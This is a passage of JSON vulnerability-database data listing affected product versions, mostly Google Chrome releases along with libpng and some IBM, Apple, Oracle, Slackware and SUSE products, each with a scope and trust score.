},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1657.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1273.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.66"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.78"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.77"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1274.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.954.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1056.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1303.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.14"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.43"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.714.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.8"
},
{
"_id": null,
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.3.5"
},
{
"_id": null,
"model": "cplex optimization studio",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.4.0.1"
},
{
"_id": null,
"model": "tivoli monitoring",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.3.1"
},
{
"_id": null,
"model": "cognos business intelligence server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "10.2.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.150"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.230"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.67"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.942.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.4"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.60"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.100"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.128"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.720.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.904.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.114"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.28"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.212"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.55"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.94"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "30.0.1599.100"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.116"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.95"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.85"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.69"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1052.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1659.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.89"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.145"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.646.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.911.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.697.0"
},
{
"_id": null,
"model": "fabric manager",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "4.1.04.0048"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.593.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.49"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.667.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.86"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.41"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.120"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.14"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.79"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.100"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.6.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.928.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.20"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1060.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.70"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.626.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1031.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.80"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.37"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.708.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.559.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.56"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.625.0"
},
{
"_id": null,
"model": "websphere real time sr7",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.64"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.11"
},
{
"_id": null,
"model": "cplex optimization studio",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "12.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1009.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.680.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.32"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.326"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1062.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.203"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "35.0.1916.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.659.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.881.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.800.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.84"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.21"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.26"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.93"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.53"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.58"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.70"
},
{
"_id": null,
"model": "enterprise content management system monitor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.96"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.768.0"
},
{
"_id": null,
"model": "mac os security update",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x2016-0020"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.82"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.40"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.871.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.80"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.61"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1010.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.35"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1304.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.670.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.27"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1281.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.23"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.611.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.126"
},
{
"_id": null,
"model": "tivoli common reporting",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.33"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1056.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1670.3"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.51"
},
{
"_id": null,
"model": "tivoli monitoring fix pack",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.303"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.839.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "21.0.1180.57"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.63"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1281.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.21"
},
{
"_id": null,
"model": "linux x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "14.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1277.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.38"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.764.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.67"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.97"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.11"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.616.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.66"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.90"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.105"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.22"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.45"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.777.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.53"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.42"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "45.0.2454"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.71"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.564.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.742.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1081.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.868.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "32.0.1700.19"
},
{
"_id": null,
"model": "linux x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.54"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.44"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1025.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.42"
},
{
"_id": null,
"model": "linux x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.70"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.99"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.17"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.2.46"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "27.0.1453.85"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.47"
},
{
"_id": null,
"model": "websphere real time",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.7"
},
{
"_id": null,
"model": "tivoli network manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.8"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.912.74"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.34"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1054.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1017.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.874.20"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1289.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.58"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.825.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.814.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.3"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.600.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.566.0"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.5.13"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.132"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "34.0.1847.137"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "16.0.877.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "15.0.860.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.648.2"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.19"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "22.0.1229.9"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1070.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.60"
},
{
"_id": null,
"model": "libpng",
"scope": "eq",
"trust": 0.3,
"vendor": "libpng",
"version": "1.0.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.958.1"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "13.0.782.92"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "28.0.1500.94"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "9.0.597.34"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.31"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.108"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "18.0.1020.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "10.0.614.0"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.57"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "14.0.835.86"
},
{
"_id": null,
"model": "linux enterprise module for legacy software",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "12"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "23.0.1271.7"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "37.0.2062.50"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "17.0.963.34"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "20.0.1132.6"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "25.0.1364.62"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "8.0.552.235"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "11.0.696.16"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "33.0.1750.111"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "31.0.1650.18"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "12.0.715.0"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.9.5"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "19.0.1084.17"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "24.0.1312.10"
},
{
"_id": null,
"model": "chrome",
"scope": "eq",
"trust": 0.3,
"vendor": "google",
"version": "29.0.1547.55"
},
{
